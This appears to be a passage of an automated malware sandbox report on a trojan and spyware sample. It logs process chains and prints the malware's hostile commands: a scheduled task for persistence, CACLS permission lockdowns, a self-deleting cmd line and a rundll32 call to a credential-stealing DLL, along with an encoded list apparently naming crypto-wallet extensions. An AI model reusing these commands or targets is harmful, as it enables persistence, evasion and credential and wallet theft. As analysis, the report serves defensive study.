                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: EB2B.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: B4A7.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: q4Z52wRd28.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cttgcewJump to behavior
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@67/24@47/20
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: q4Z52wRd28.exeVirustotal: Detection: 31%
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\q4Z52wRd28.exe C:\Users\user\Desktop\q4Z52wRd28.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\cttgcew C:\Users\user\AppData\Roaming\cttgcew
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A852.exe C:\Users\user\AppData\Local\Temp\A852.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B4A7.exe C:\Users\user\AppData\Local\Temp\B4A7.exe
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CF35.exe C:\Users\user\AppData\Local\Temp\CF35.exe
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E35A.exe C:\Users\user\AppData\Local\Temp\E35A.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F771.exe C:\Users\user\AppData\Local\Temp\F771.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A852.exe C:\Users\user\AppData\Local\Temp\A852.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B4A7.exe C:\Users\user\AppData\Local\Temp\B4A7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CF35.exe C:\Users\user\AppData\Local\Temp\CF35.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E35A.exe C:\Users\user\AppData\Local\Temp\E35A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F771.exe C:\Users\user\AppData\Local\Temp\F771.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A852.tmpJump to behavior
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: EB2B.exe, 00000024.00000003.489269330.00000000273D4000.00000004.00000800.00020000.00000000.sdmp, 07477506288530029273670714.36.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00404350 ShellExecuteA,CreateToolhelp32Snapshot,
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                      Source: 13.3.B4A7.exe.d290000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: 13.3.B4A7.exe.d290000.1.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_01
